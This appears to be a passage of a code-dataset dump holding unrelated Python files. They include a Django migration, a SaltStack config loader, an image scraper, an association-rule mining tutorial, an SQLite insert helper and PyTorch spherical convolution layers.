head\n","sub_path":"dataStructure/LinkedList/Flatten.py","file_name":"Flatten.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"224574278","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport tools.fields\nimport tools.utils\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('frame', '0006_auto_20180524_0937'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='InterfaceLog',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('operating_time', models.DateTimeField(auto_now_add=True, verbose_name='\\u64cd\\u4f5c\\u65f6\\u95f4')),\n ('operator_address', models.GenericIPAddressField(null=True, verbose_name='\\u64cd\\u4f5c\\u7aef\\u5730\\u5740', blank=True)),\n ('operator_type', models.CharField(max_length=500, null=True, verbose_name='\\u64cd\\u4f5c\\u7c7b\\u578b', blank=True)),\n ('operation_object', models.CharField(max_length=500, null=True, verbose_name='\\u64cd\\u4f5c\\u5bf9\\u8c61', blank=True)),\n ('operating_results', models.CharField(max_length=200, null=True, verbose_name='\\u64cd\\u4f5c\\u7ed3\\u679c', blank=True)),\n ('detail_info', models.TextField(max_length=500, null=True, verbose_name='\\u8be6\\u7ec6\\u4fe1\\u606f', blank=True)),\n ('app', models.CharField(max_length=20, verbose_name='\\u5173\\u8054\\u5e94\\u7528')),\n ],\n options={\n 'verbose_name': '\\u63a5\\u53e3\\u65e5\\u5fd7',\n 'verbose_name_plural': '\\u63a5\\u53e3\\u65e5\\u5fd7',\n },\n ),\n migrations.CreateModel(\n name='SessionTicket',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('session_key', tools.fields.FixEncryptedCharField(max_length=255)),\n ('ticket', tools.fields.FixEncryptedCharField(max_length=255)),\n ],\n ),\n migrations.CreateModel(\n name='UserLog',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('operating_time', models.DateTimeField(auto_now_add=True, verbose_name='\\u64cd\\u4f5c\\u65f6\\u95f4')),\n ('operator_address', models.GenericIPAddressField(null=True, verbose_name='\\u64cd\\u4f5c\\u7aef\\u5730\\u5740', blank=True)),\n ('operator_type', models.CharField(max_length=500, null=True, verbose_name='\\u64cd\\u4f5c\\u7c7b\\u578b', blank=True)),\n ('operation_object', models.CharField(max_length=500, null=True, verbose_name='\\u64cd\\u4f5c\\u5bf9\\u8c61', blank=True)),\n ('operating_results', models.CharField(max_length=200, null=True, verbose_name='\\u64cd\\u4f5c\\u7ed3\\u679c', blank=True)),\n ('detail_info', models.TextField(max_length=500, null=True, verbose_name='\\u8be6\\u7ec6\\u4fe1\\u606f', blank=True)),\n ('user', models.CharField(max_length=20, verbose_name='\\u7528\\u6237')),\n ],\n options={\n 'verbose_name': '\\u7528\\u6237\\u65e5\\u5fd7',\n 'verbose_name_plural': '\\u7528\\u6237\\u65e5\\u5fd7',\n },\n ),\n migrations.RemoveField(\n model_name='passwordcodes',\n name='user',\n ),\n migrations.AddField(\n model_name='userprofile',\n name='hw_email',\n field=tools.fields.EncryptedEmailField(max_length=255, null=True, verbose_name='\\u534e\\u4e3a\\u90ae\\u7bb1', blank=True),\n ),\n migrations.AlterField(\n model_name='app',\n name='secret',\n field=models.CharField(help_text='Required. 16 ~ 128 characters. Letters, digits and special character only.', max_length=200, verbose_name=b'Secret'),\n ),\n migrations.AlterField(\n model_name='apptoken',\n name='key',\n field=tools.fields.EncryptedCharField(max_length=255, verbose_name='Key', blank=True),\n ),\n migrations.AlterField(\n model_name='useraccesscodes',\n name='codes',\n field=models.CharField(max_length=128, verbose_name='\\u9a8c\\u8bc1\\u7801'),\n ),\n migrations.AlterField(\n model_name='usercodes',\n name='codes',\n field=models.CharField(max_length=128, verbose_name='\\u9a8c\\u8bc1\\u7801'),\n ),\n migrations.AlterField(\n model_name='userprofile',\n name='is_active_type',\n field=models.IntegerField(default=0, null=True, verbose_name='\\u6ce8\\u9500\\u7c7b\\u578b', blank=True, choices=[(0, '\\u8d26\\u53f7\\u6709\\u6548'), (1, '\\u8d26\\u53f7\\u5230\\u671f'), (2, '\\u8bc1\\u4e66\\u65e0\\u6548'), (3, '\\u90e8\\u95e8\\u6539\\u53d8'), (4, '\\u6ca1\\u6709\\u8d26\\u53f7'), (5, '\\u79bb\\u804c'), (6, '\\u957f\\u671f\\u672a\\u767b\\u5f55'), (7, '\\u5de5\\u53f7\\u53d8\\u66f4')]),\n ),\n migrations.AlterField(\n model_name='userprofile',\n name='phone_number',\n field=tools.fields.EncryptedCharField(blank=True, max_length=255, null=True, verbose_name='\\u624b\\u673a\\u53f7\\u7801', validators=[tools.utils.check_phone]),\n ),\n migrations.AlterField(\n model_name='userprofile',\n name='safe_email',\n field=tools.fields.EncryptedEmailField(max_length=255, null=True, verbose_name='\\u5b89\\u5168\\u90ae\\u7bb1', blank=True),\n ),\n ]\n","sub_path":"WiseEyeIAMService/frame/migrations/0007_auto_20180704_1654.py","file_name":"0007_auto_20180704_1654.py","file_ext":"py","file_size_in_byte":5449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"310197869","text":"'''\nThe loader is created by the main SaltEventsDaemon. It takes care of loading\nthe given config with a default of '/etc/salt/eventsd'. It also takes care of\ninitializing the logger from saltstack.\n'''\n\nimport sys\nimport logging\nimport salt.log\nimport os\nimport yaml\n\nlogger = salt.log.setup.logging.getLogger(__name__)\nlog = logging.getLogger(__name__)\n\n\nclass SaltEventsdLoader(object):\n '''\n The loader takes care of reading the configfile and\n setting up the correct logger.\n '''\n def __init__(self, config=None, log_level=None, log_file=None, daemonize=False):\n self.config_file = config if config else \"/etc/salt/eventsd\"\n # retrieve current settings from the config file\n self.opts = None\n self._read_yaml(self.config_file)\n\n # make sure we have a 'general' section\n if 'general' in self.opts.keys():\n self.gen_opts = self.opts['general']\n\n # Use log level if explicitly set from cli\n if log_level:\n self.gen_opts['loglevel'] = log_level\n\n # Use log file if explicitly set from cli\n if log_file:\n self.gen_opts['logfile'] = log_file\n\n self.gen_opts['daemonize'] = daemonize\n\n self._init_logger()\n log.info(\"loaded config from {0}\".format(config))\n\n def _init_logger(self):\n '''\n sets up the logger used throughout saltt-eventsd\n '''\n # make sure we have the required settings for our logging\n if ('logfile' in self.gen_opts) and \\\n ('loglevel' in self.gen_opts):\n\n salt.log.setup_logfile_logger(\n self.gen_opts['logfile'],\n self.gen_opts['loglevel'],\n )\n\n # Only log to foreground if not running as a daemon\n if not self.gen_opts['daemonize']:\n salt.log.setup_console_logger(\n log_level=self.gen_opts['loglevel'],\n )\n else:\n # if no log settings found, use defaults\n\n # Only log to foreground if not running as a daemon\n if not self.gen_opts['daemonize']:\n salt.log.setup_console_logger(\n log_level=\"warn\"\n )\n\n salt.log.setup_logfile_logger(\n '/var/log/salt/eventsd',\n 'warn',\n )\n\n def getopts(self):\n '''\n returns the parsed options to the SaltEventsDaemon-Class\n '''\n return self.opts\n\n def _read_yaml(self, path):\n '''\n reads a yaml-formatted configuration file at the given path and\n returns a python dictionary with the pared items in it.\n '''\n try:\n yaml_handle = open(path)\n self.opts = yaml.load(yaml_handle.read())\n except yaml.parser.ParserError as yamlerr:\n print(\"Failed to parse configfile: {0}\".format(path))\n print(yamlerr)\n sys.exit(1)\n except yaml.scanner.ScannerError as yamlerr:\n print(\"Failed to parse configfile: {0}\".format(path))\n print(yamlerr)\n sys.exit(1)\n except IOError as ioerr:\n print(\"Failed to read configfile:\")\n print(os.strerror(ioerr.errno))\n sys.exit(1)\n except OSError as oserr:\n print(\"Failed to read configfile:\")\n print(os.strerror(oserr.errno))\n sys.exit(1)\n","sub_path":"salteventsd/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":3410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"25485943","text":"import numpy as np\nimport itertools\nfrom sklearn.model_selection import train_test_split\n\ndef create_inp_opt(data):\n inp_opt = map(lambda x:x.split('='), data)\n inp_opt_chars = list(map(lambda x: [list(x[0]), list(x[1])], inp_opt))\n \n return inp_opt_chars\n\ndef create_vocab(data):\n inp_opt_merged = list(map(lambda x: list(itertools.chain(*x)), data))\n vocab = set(itertools.chain(*inp_opt_merged))\n vocab = vocab.union({'start', 'end'})\n \n return vocab\n\ndef create_mapping(vocab):\n mapping = {}\n for i in range(len(vocab)):\n mapping[vocab[i]] = i+1\n \n mapping['pad'] = 0\n \n return mapping\n\ndef inp_opt(inp_opt_chars, mapping):\n inp_opt_mapped = list(map(lambda x:[[mapping['start']]+[mapping[i] for i in x[0]]+[mapping['end']], \n [mapping['start']]+[mapping[i] for i in x[1]]+[mapping['end']]], inp_opt_chars))\n \n inp = list(map(lambda x:x[0], inp_opt_mapped))\n opt = list(map(lambda x:x[1], inp_opt_mapped))\n \n return inp, opt\n\nfile = open('dataset.txt','r')\ndata = file.read()\n\ndata = data.split('\\n')[:-1]\n\ntrain, test = train_test_split(data, test_size=0.10, random_state=1)\ntrain, val = train_test_split(train, test_size=0.10, random_state=1)\n\nwith open('train.txt', 'w') as filehandle:\n filehandle.writelines(\"%s\\n\" % exp for exp in train)\n \nwith open('valid.txt', 'w') as filehandle:\n filehandle.writelines(\"%s\\n\" % exp for exp in val)\n \nwith open('test.txt', 'w') as filehandle:\n filehandle.writelines(\"%s\\n\" % exp for exp in test)\n","sub_path":"transformer/dataprocessing.py","file_name":"dataprocessing.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"215358186","text":"from django.conf.urls.defaults import *\n\n# JC: Add urls.py branch to deal with JSON / DATA / API requests. Clean things up.\n# Notes:\n# Allow for endings in / or \"\" where possible\n#\nurlpatterns = patterns('v1',\n (r'api/(?Ptopic)/(?P\\d+)/(?Pstories)/', include('json.gettopic.urls')),\n (r'api/(?Ptopic)/(?P\\d+)/(?Psubtopics)/', include('json.gettopic.urls')),\n (r'api/(?Ptopic)/(?P\\d+)', include('json.gettopic.urls')),\n (r'api/(?Pstory)/', include('json.getuser.urls')),\n (r'api/(?Ptopic)/', include('topic.urls')),\n (r'location$', include('json.location.urls')),\n (r'location/$', include('json.location.urls'))\n)\n","sub_path":"fishbone/urls-api.py","file_name":"urls-api.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"170238353","text":"import numpy as np\nimport sqlite3\n\ndef _insert(db, sql):\n conn = sqlite3.connect(db)\n curs = conn.cursor()\n if isinstance(sql, list):\n for s in sql:\n curs.execute(s)\n else:\n curs.execute(sql)\n conn.commit()\n conn.close()\n\ndef insertSQL(db, name, price, quantity, chain=False):\n pid = np.random.randint(111111,1000000)\n sql = f'''INSERT INTO inventory (pid,name,price,quantity)\n VALUES ({pid},'{name}',{price},{quantity})'''\n if chain:\n return sql\n _insert(db, sql)\n \ndef mass_insert_test(db):\n names = ['hammer','nails','screws','glass','wood','metal',\n 'canvas','pins','glue','paint','pens','bags']\n prices = [5.99,0.50,0.75,11.99,3.75,5.25,\n 1.99,0.25,2.25,6.75,1.25,0.75]\n quants = np.random.randint(200, 500, len(names))\n sql = []\n for i in range(len(names)):\n sql.append((insertSQL(db, names[i], prices[i], quants[i], chain=True)))\n _insert(db, sql)\n","sub_path":"insertModule.py","file_name":"insertModule.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"412354484","text":"\"\"\"\nWrite a recursive function called palindrome which will receive a word and an index (always 0). Implement the function,\nso it returns \"{word} is a palindrome\" if the word is a palindrome and \"{word} is not a palindrome\" if the word is not\na palindrome using recursion.\n\n\"\"\"\n\n\ndef palindrome(word, index):\n stop = len(word) // 2\n if index == stop:\n return f'{word} is a palindrome'\n if word[index] == word[len(word)-1-index]:\n return palindrome(word, index+1)\n else:\n return f'{word} is not a palindrome'\n\nprint(palindrome(\"abcba\", 0))\nprint(palindrome(\"peter\", 0))","sub_path":"Functions Advanced/recursion_palindrome.py","file_name":"recursion_palindrome.py","file_ext":"py","file_size_in_byte":601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"295514502","text":"# Image Scraper\r\n\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nfrom PIL import Image\r\nfrom io import BytesIO\r\nimport os\r\n\r\n\r\ndef StartSearch():\r\n search = input(\"Search for:\")\r\n params = {\"q\": search}\r\n # Create a directory name by using the search query, and replacing any spaces with underscores\r\n dir_name = search.replace(\" \", \"_\").lower()\r\n\r\n # .path(): This is a function from the OS library that checks the current path of the program\r\n # isdir(): This is a function from the OS library that checks to see if this is a valid directory name\r\n if not os.path.isdir(dir_name):\r\n # .makedirs(): This is a function from the OS library that creates a directory\r\n # Create the directory:\r\n os.makedirs(dir_name)\r\n\r\n r = requests.get(\"http://www.bing.com/images/search\", params=params)\r\n\r\n soup = BeautifulSoup(r.text, \"html.parser\")\r\n\r\n # Create a list of \"thumb\" class links, obviously for thumbnail images\r\n links = soup.findAll(\"a\", {\"class\": \"thumb\"})\r\n\r\n for item in links:\r\n try:\r\n # Use the requests library, and the .get() function to find each of the href locations of all the links\r\n img_obj = requests.get(item.attrs[\"href\"])\r\n print(\"Getting:\", item.attrs[\"href\"])\r\n # Use the .split() function to split the href location\r\n # [-1]: This is a Python way to index into the last element of a list\r\n title = item.attrs[\"href\"].split(\"/\")[-1]\r\n try:\r\n img = Image.open(BytesIO(img_obj.content))\r\n # Create a new directory called \"scraped_images\" in the actual Python project\r\n # .save(): This is a function from the Image library which needs the directory of the image file on your computer\r\n img.save(\"./\" + dir_name + \"/\" + title, img.format)\r\n except:\r\n print(\"Could not save image\")\r\n except:\r\n print(\"Could not request image\")\r\n # This forces the function to call itself again so it loops\r\n StartSearch()\r\n\r\n\r\n# Call the function:\r\nStartSearch()","sub_path":"python/01PythonStackskillsCourse/06WebScraper/Image Scraper/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"45832812","text":"#\n# 프로그램 이름: association_basics.py\n# 작성자: Bong Ju Kang\n# 설명: 연관 분석 이해하기\n#\n\n# 필요한 패키지\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom matplotlib import cm\nfrom numpy.random import RandomState\n\nfrom mlxtend.preprocessing import TransactionEncoder\nfrom mlxtend.frequent_patterns import apriori, association_rules\n\nfrom sklearn.cluster import KMeans\nfrom sklearn.datasets.samples_generator import make_blobs\nfrom sklearn.metrics import silhouette_score, silhouette_samples\n\n# 초기 설정\npng_path = \"./data/png\"\nos.makedirs(png_path, exist_ok=True)\n\n# 한글출력\nplt.rcParams['font.family'] = 'Malgun Gothic'\nplt.rcParams['axes.unicode_minus'] = False\n\n#\n# 본문 예시 예제\n#\n\n# 데이터 생성\ntr_data = [['milk', 'bread'],\n ['butter'],\n ['beer', 'diapers'],\n ['milk', 'bread', 'butter'],\n ['bread']]\n\n# 데이터 전 처리\ntr_encoder = TransactionEncoder()\ntr_encoder.fit(tr_data)\ntr_encoder.columns_\n# ['beer', 'bread', 'butter', 'diapers', 'milk']\n\ntr_encoder_ary = tr_encoder.transform(tr_data)\ntr_encoder_ary = np.where(tr_encoder_ary==True, 1, 0)\ndf = pd.DataFrame(tr_encoder_ary, columns=tr_encoder.columns_ )\nprint(df)\n# beer bread butter diapers milk\n# 0 0 1 0 0 1\n# 1 0 0 1 0 0\n# 2 1 0 0 1 0\n# 3 0 1 1 0 1\n# 4 0 1 0 0 0\n\n# 연관 모델 적합\nfreq_items = apriori(df, min_support=0.4, use_colnames=True, n_jobs=-1)\n\nfreq_items['length'] = freq_items['itemsets'].apply(lambda x: len(x))\n\n# itemsets 컬럼은 frozenset 속성을 갖고 있다. 즉, 변경이 불가능한 집합으로 구성되어 있다.\ntype(freq_items['itemsets'][0])\n# frozenset\n\n# 아래의 2개의 결과는 같다.\nfreq_items[freq_items['itemsets'] == {'bread', 'milk'}]\nfreq_items[freq_items['itemsets'] == {'milk', 'bread'}]\n\n#\n# 선험 알고리즘 예시\n#\n# 데이터 구성\ntr_data = [[1, 2, 3, 4],\n [1, 2, 4],\n [1, 2],\n [2, 3, 4],\n [2, 3],\n [3, 4],\n [2, 4]]\n\n# 데이터 전 처리\ntr_encoder = TransactionEncoder()\ntr_encoder.fit(tr_data)\ntr_encoder.columns_\n\ntr_encoder_ary = tr_encoder.transform(tr_data)\ntr_encoder_ary = np.where(tr_encoder_ary==True, 1, 0)\ndf = pd.DataFrame(tr_encoder_ary, columns=tr_encoder.columns_)\nprint(df)\n\n# 연관 모델 적합\n# 길이가 1개짜리 전부\nfreq_items = apriori(df, min_support=0, max_len=1, use_colnames=True)\nprint(freq_items)\n\n# 지지도가 3/7= 0.43 이상인 경우만\nfreq_items = apriori(df, min_support=3/7, max_len=1, use_colnames=True)\nprint(freq_items)\n\n# 길이가 2개짜리 전부\nfreq_items = apriori(df, min_support=0, max_len=2, use_colnames=True)\nfreq_items['length'] = freq_items['itemsets'].apply(lambda x: len(x))\n\n# 길이가 2개이면서, 지지도 조건을 충족하는 경우\nprint(freq_items[(freq_items['length'] == 2) & (freq_items['support'] >= 3.0/7.0)])\n# support itemsets length\n# 4 0.428571 (1, 2) 2\n# 7 0.428571 (2, 3) 2\n# 8 0.571429 (2, 4) 2\n# 9 0.428571 (3, 4) 2\n\n# 길이가 3개짜리 전부\nfreq_items = apriori(df, min_support=0, max_len=3, use_colnames=True)\nfreq_items['length'] = freq_items['itemsets'].apply(lambda x: len(x))\nprint(freq_items[freq_items['length'] == 3])\n# support itemsets length\n# 10 0.142857 (1, 2, 3) 3\n# 11 0.285714 (1, 2, 4) 3\n# 12 0.142857 (1, 3, 4) 3\n# 13 0.285714 (2, 3, 4) 3\n# 길이가 3이면서 지지도 조건을 충족하는 경우\nprint(freq_items[(freq_items['length'] == 3) & (freq_items['support'] >= 3.0/7.0)])\n# Empty DataFrame\n# Columns: [support, itemsets, length]\n# Index: []\n# 길이가 3인 경우는 고빈도 집합이 없으므로 길이가 2인 경우로 마무리 된다.\n\n#\n# 규칙 생성\n#\n\n# 규칙을 생성하기 위한 고빈도 집합 생성\nfreq_items = apriori(df, min_support=3/7, max_len=3, use_colnames=True)\n\n# 고빈도 집합 기반으로 규칙 생성: support, confidence, lift 기준 적용 가능\nasso_rules = association_rules(freq_items, metric='confidence', min_threshold=1)\nprint(asso_rules.columns)\n# ['antecedents', 'consequents', 'antecedent support',\n# 'consequent support', 'support', 'confidence', 'lift', 'leverage',\n# 'conviction']\n\n# 결과 확인\nasso_rules[['antecedents', 'consequents', 'support', 'confidence', 'lift']]\n\n#\n# 예제: [RETAIL] 데이터를 이용한 예제\n#\n\n#\n# 데이터 구성\n#\n# 데이터 불러오기\nretail = pd.read_excel('https://archive.ics.uci.edu/ml/machine-learning-databases/00352/Online%20Retail.xlsx')\n# retail.to_csv(data_path+'/retail.csv')\nretail.columns\n# Index(['InvoiceNo', 'StockCode', 'Description', 'Quantity', 'InvoiceDate',\n# 'UnitPrice', 'CustomerID', 'Country'],\n# dtype='object')\n\n# 소문자로 변수명를 사용하기 위하여\nnew_columns = retail.columns.str.lower()\nretail.columns = new_columns\n\n# 데이터 탐색\nretail['stockcode'].value_counts()\n# Name: stockcode, Length: 4070, dtype: int64\nretail['country'].value_counts()[:5]\n# United Kingdom 495478\n# Germany 9495\n# France 8557\n# EIRE 8196\n# Spain 2533\n# Name: country, dtype: int64\n\n#\n# 일부 데이터만 구성: Germany에서만 팔린 데이터로 구성\n#\ndf = retail[retail.country=='Germany']\ndf.stockcode.value_counts()\n# Name: stockcode, Length: 1671, dtype: int64\n\n# 데이터 전 처리: 거래 데이터 구성\n\n# 결측값 확인\ndf.isna().sum()\n\n# 거래 데이터 구성\ntrxs = df.groupby(['invoiceno', 'description'])['quantity'].sum().unstack(fill_value=0).reset_index().set_index('invoiceno')\ntrxs_df = pd.DataFrame(np.where(trxs > 1, 1, 0), columns=trxs.columns, index=trxs.index)\n\n# 고빈도 집합 찾기\nsupp_cutoff = 0.05 # 5%\npd.set_option('display.max_columns', 15)\npd.set_option('display.width', 500)\n\nfreq_items = apriori(trxs_df, min_support=supp_cutoff, use_colnames=True)\nfreq_items.sort_values(by='support', ascending=False).head()\n# support itemsets\n# 12 0.442786 (POSTAGE)\n# 18 0.185738 (ROUND SNACK BOXES SET OF4 WOODLAND )\n# 34 0.139303 (ROUND SNACK BOXES SET OF4 WOODLAND , POSTAGE)\n# 17 0.119403 (ROUND SNACK BOXES SET OF 4 FRUITS )\n# 11 0.104478 (PLASTERS IN TIN WOODLAND ANIMALS)\n\n# 고빈도 집합 기반의 규칙 찾기\nrules = association_rules(freq_items, metric='lift', min_threshold=1)\nrules.sort_values(by='lift', ascending=False, inplace=True)\n\n# 후행 품목집합이 있는 경우\nrules[rules.consequents != ''][['antecedents', 'consequents', 'support', 'confidence', 'lift']].head()\n# antecedents consequents support confidence lift\n# 4 (PLASTERS IN TIN WOODLAND ANIMALS) (PLASTERS IN TIN CIRCUS PARADE ) 0.051410 0.492063 5.598383\n# 5 (PLASTERS IN TIN CIRCUS PARADE ) (PLASTERS IN TIN WOODLAND ANIMALS) 0.051410 0.584906 5.598383\n# 34 (ROUND SNACK BOXES SET OF 4 FRUITS ) (ROUND SNACK BOXES SET OF4 WOODLAND , POSTAGE) 0.079602 0.666667 4.785714\n# 31 (ROUND SNACK BOXES SET OF4 WOODLAND , POSTAGE) (ROUND SNACK BOXES SET OF 4 FRUITS ) 0.079602 0.571429 4.785714\n# 26 (ROUND SNACK BOXES SET OF4 WOODLAND ) (ROUND SNACK BOXES SET OF 4 FRUITS ) 0.099502 0.535714 4.486607\n\n","sub_path":"reference/understanding-ml-code/ch24-연관 분석/association_basics.py","file_name":"association_basics.py","file_ext":"py","file_size_in_byte":7643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"405532465","text":"import random\n\nChoice = random.choice([\"Is Jacob stable?: \",\"Does Aiden have good fills?: \",\"Does Jacob play good?: \"])\nList = [\"Is Jacob stable?: \",\"Does Aiden have good fills?: \",\"Does Jacob play good?: \"]\nwhile True:\n Input = input(Choice)\n if Choice == List[0]:\n if Input.lower() in [\"yes\",\"y\",\"ye\"]:\n print(\"Incorrect, doctor says not\")\n break\n elif Input.lower() in [\"no\",\"n\"]:\n print(\"You have 200 IQ\")\n break\n else:\n print(\"Incorrect syntax, try again\")\n elif Choice == List[1]:\n print(\"Is this even a question? Of course he does, jk he needs notes from bekkett and luke\")\n break\n elif Choice == List[2]:\n if Input.lower() in [\"yes\",\"ye\",\"y\"]:\n print(\"Incorrect, he needs to take notes\")\n break\n elif Input.lower() in [\"no\",\"n\"]:\n print(\"True, he needs to take notes\")\n break\n else:\n print(\"Incorrect syntax, try again\")","sub_path":"PythonApplication1/src/Choices.py","file_name":"Choices.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"48722464","text":"if __name__ == '__main__':\n\tf = open('USDJPY.csv', 'r')\n\tarray = []\n\tfor line in f:\n\t\tvalues = line.split(',')\n\t\tv_open = eval(values[2])\n\t\tv_high = eval(values[3])\n\t\tv_low = eval(values[4])\n\t\tv_close = eval(values[5])\n\t\tv_amount = eval(values[6])\n\t\tarray.append((v_open, v_close, v_high, v_low, v_amount))\n\tf.close()\n\t\n\tpos = 0\n\tsummary = []\n\t\n\tP = 5\n\t\n\twhile pos + P <= len(array):\n\t\tS = 0\n\t\tA = 0\n\t\tH = 0\n\t\tL = 999\n\t\t\n\t\tv_open = array[pos][0]\n\t\tv_close = array[pos + P - 1][1]\n\t\t\n\t\tfor j in range(P):\n\t\t\th = array[pos + j][2]\n\t\t\tl = array[pos + j][3]\n\t\t\taverage = (h + l) / 2\n\t\t\t\n\t\t\tS += average * array[pos + j][4]\n\t\t\tA += array[pos + j][4]\n\t\t\tH = max(H, h)\n\t\t\tL = min(L, l)\n\t\t\n\t\tsummary.append((S / A, v_open, v_close, H, L, A))\n\t\tpos += P\n\t\n\tM = 100000\n\t\n\tfor j in range(len(summary) / M):\n\t\tf = open('train' + str(j + 1) + '.txt', 'w')\n\t\tfor k in range(M):\n\t\t\tpos = j * M + k\n\t\t\tf.write(str(summary[pos]) + '\\n')\n\t\tf.close()\n\t\t\n\tf = open('test.txt', 'w')\n\tpos = (len(summary) / M) * M\n\twhile pos < len(summary):\n\t\tf.write(str(summary[pos]) + '\\n')\n\t\tpos += 1\n\tf.close()\n","sub_path":"history/extract.py","file_name":"extract.py","file_ext":"py","file_size_in_byte":1088,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"424060472","text":"import re\n\nf = open('wb_dump.sql','r')\np_name = re.compile(\"'[A-Z][a-z]+[^']*'\")\np_coordinates = re.compile(\"MULTIPOLYGON\\([^']*'\")\nfor line in f:\n m = p_name.search(line)\n country_name = m.group()[1:(len(m.group())-1)]\n m = p_coordinates.search(line)\n coordinates_string = m.group()[13:(len(m.group())-5)]\n coordinates = coordinates_string.split(' )),((')\n coordinates[0] = coordinates[0][2:len(coordinates[0])]\n f_out = open('countries_borders/'+country_name+'.json','w')\n f_out.write('{\\n')\n f_out.write('\t\"country_name\": '+ '\"' + country_name + '\",\\n')\n f_out.write('\t\"coordinates\": [\\n')\n last_elem = coordinates.pop()\n for elem in coordinates:\n f_out.write('\t\t[\\n')\n terr = elem.split(',')\n last_path = terr.pop()\n for path in terr:\n path = re.sub(' +', ',', path)\n f_out.write('\t\t\t\"'+ path[0:len(path)-1] + '\",\\n')\n last_path = re.sub(' +', ',', last_path)\n f_out.write('\t\t\t\"'+ path[0:len(path)-1] + '\"\\n')\n f_out.write('\t\t],\\n')\n f_out.write('\t\t[\\n')\n terr = last_elem.split(',')\n last_path = terr.pop()\n for path in terr:\n path = re.sub(' +', ',', path)\n f_out.write('\t\t\t\"'+ path[0:len(path)-1] + '\",\\n')\n last_path = re.sub(' +', ',', last_path)\n f_out.write('\t\t\t\"'+ path[0:len(path)-1] + '\"\\n')\n f_out.write('\t\t]\\n')\n f_out.write('\t]\\n')\n f_out.write('}')\n f_out.close()\nf.close()\n","sub_path":"public/countries/python-script.py","file_name":"python-script.py","file_ext":"py","file_size_in_byte":1443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"143474030","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 25 14:18:30 2018\n\n@author: Fenqiang Zhao, https://github.com/zhaofenqiang\n\nContact: zhaofenqiang0221@gmail.com\n\n\"\"\"\n\nimport torch\nimport numpy as np\nimport torch.nn as nn\n\n\nclass repa_conv_layer(nn.Module):\n \"\"\"Define the convolutional layer on icosahedron discretized sphere using \n rectagular filter in tangent plane\n \n Parameters:\n in_feats (int) - - input features/channels\n out_feats (int) - - output features/channels \n \n Input: \n N x in_feats, tensor\n Return:\n N x out_feats, tensor\n \"\"\" \n def __init__(self, in_feats, out_feats, neigh_indices, neigh_weights):\n super(repa_conv_layer, self).__init__()\n\n self.in_feats = in_feats\n self.out_feats = out_feats\n self.neigh_indices = neigh_indices.reshape(-1) - 1\n self.weight = nn.Linear(25 * in_feats, out_feats)\n self.nodes_number = neigh_indices.shape[0]\n \n neigh_weights = np.reshape(np.tile(neigh_weights, self.in_feats), (neigh_weights.shape[0],neigh_weights.shape[1],3,-1)).astype(np.float32)\n self.neigh_weights = torch.from_numpy(neigh_weights).cuda() \n \n def forward(self, x):\n \n mat = x[self.neigh_indices]\n mat = mat.view(self.nodes_number, 25, 3, -1)\n assert(mat.size() == torch.Size([self.nodes_number, 25, 3, self.in_feats]))\n \n assert(mat.size() == self.neigh_weights.size())\n\n x = torch.mul(mat, self.neigh_weights)\n x = torch.sum(x, 2).view(self.nodes_number, -1)\n assert(x.size() == torch.Size([self.nodes_number, 25 * self.in_feats]))\n \n out = self.weight(x)\n return out\n\n\nclass onering_conv_layer(nn.Module):\n \"\"\"The convolutional layer on icosahedron discretized sphere using \n 1-ring filter\n \n Parameters:\n in_feats (int) - - input features/channels\n out_feats (int) - - output features/channels\n \n Input: \n N x in_feats tensor\n Return:\n N x out_feats tensor\n \"\"\" \n def __init__(self, in_feats, out_feats, neigh_orders, neigh_indices=None, neigh_weights=None):\n super(onering_conv_layer, self).__init__()\n\n self.in_feats = in_feats\n self.out_feats = out_feats\n self.neigh_orders = neigh_orders\n \n self.weight = nn.Linear(7 * in_feats, out_feats)\n \n def forward(self, x):\n \n mat = x[self.neigh_orders].view(len(x), 7*self.in_feats)\n \n out_features = self.weight(mat)\n return out_features\n \n \nclass tworing_conv_layer(nn.Module):\n \"\"\"The convolutional layer on icosahedron discretized sphere using \n 2-ring filter\n \n Parameters:\n in_feats (int) - - input features/channels\n out_feats (int) - - output features/channels\n \n Input: \n N x in_feats tensor\n Return:\n N x out_feats tensor\n \"\"\" \n def __init__(self, in_feats, out_feats, neigh_orders):\n super(tworing_conv_layer, self).__init__()\n\n self.in_feats = in_feats\n self.out_feats = out_feats\n self.neigh_orders = neigh_orders\n \n self.weight = nn.Linear(19 * in_feats, out_feats)\n \n def forward(self, x):\n \n mat = 